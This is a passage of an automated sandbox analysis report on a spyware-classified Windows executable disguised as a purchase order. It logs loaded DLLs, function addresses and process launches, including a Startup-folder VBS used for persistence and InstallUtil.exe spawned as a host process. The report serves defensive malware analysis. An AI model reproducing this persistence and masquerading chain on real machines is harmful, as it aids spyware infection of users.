                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06615BFE2_2_06615BFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066139002_2_06613900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066101A82_2_066101A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066156A02_2_066156A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066156972_2_06615697
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066157892_2_06615789
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06615C072_2_06615C07
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06615CD32_2_06615CD3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066132452_2_06613245
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066138FE2_2_066138FE
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_0134A0414_2_0134A041
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_0134A0674_2_0134A067
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_013428F04_2_013428F0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_013428E14_2_013428E1
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_01342E784_2_01342E78
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_05DBC9B84_2_05DBC9B8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_05DB30D84_2_05DB30D8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_05DB30C84_2_05DB30C8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_05DBC9A84_2_05DBC9A8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06B4F6284_2_06B4F628
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06B44C784_2_06B44C78
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06B470384_2_06B47038
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06B489AB4_2_06B489AB
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06B4CF184_2_06B4CF18
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06B414204_2_06B41420
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06B44C684_2_06B44C68
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06BA3B0F4_2_06BA3B0F
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06BA05B84_2_06BA05B8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06BA05A94_2_06BA05A9
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06BA51284_2_06BA5128
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06BA3E474_2_06BA3E47
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C474B04_2_06C474B0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C400404_2_06C40040
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C474A04_2_06C474A0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C4BC634_2_06C4BC63
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C400064_2_06C40006
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C479C14_2_06C479C1
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C461984_2_06C46198
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C461A84_2_06C461A8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D63CEC4_2_06D63CEC
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D640AC4_2_06D640AC
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D63C704_2_06D63C70
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D63C604_2_06D63C60
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D6414D4_2_06D6414D
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D63D2E4_2_06D63D2E
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D63D2B4_2_06D63D2B
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D797F04_2_06D797F0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D73D704_2_06D73D70
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D797DF4_2_06D797DF
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D7E4974_2_06D7E497
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D7BCB84_2_06D7BCB8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D7BCA84_2_06D7BCA8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D79C254_2_06D79C25
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_0704E2B04_2_0704E2B0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_0704DF004_2_0704DF00
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_070300064_2_07030006
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_070300404_2_07030040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C1A405_2_024C1A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C23F85_2_024C23F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C24625_2_024C2462
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C24785_2_024C2478
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C243C5_2_024C243C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C24CF5_2_024C24CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C24E65_2_024C24E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C248E5_2_024C248E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C24A75_2_024C24A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C455F5_2_024C455F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C1A405_2_024C1A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C1A305_2_024C1A30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C4B405_2_024C4B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C1E205_2_024C1E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024C1E305_2_024C1E30
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69483700366.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.0000000002B1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOrkexnhsfu.exe" vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000000.69354653342.00000000004C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePO56.exe* vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.0000000004323000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.000000000449A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.000000000296C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.00000000060E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePO56.exe* vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69504846703.0000000006310000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFozxv.dll" vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507522952.00000000066C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exeBinary or memory string: OriginalFilenamePO56.exe* vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/4@2/2
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\fc2a428e6332
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs"
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: PO-12202432_ACD_Group.pif.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: PO-12202432_ACD_Group.pif.exeReversingLabs: Detection: 68%
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile read: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe "C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe"
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe"
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: schannel.dllJump to behavior
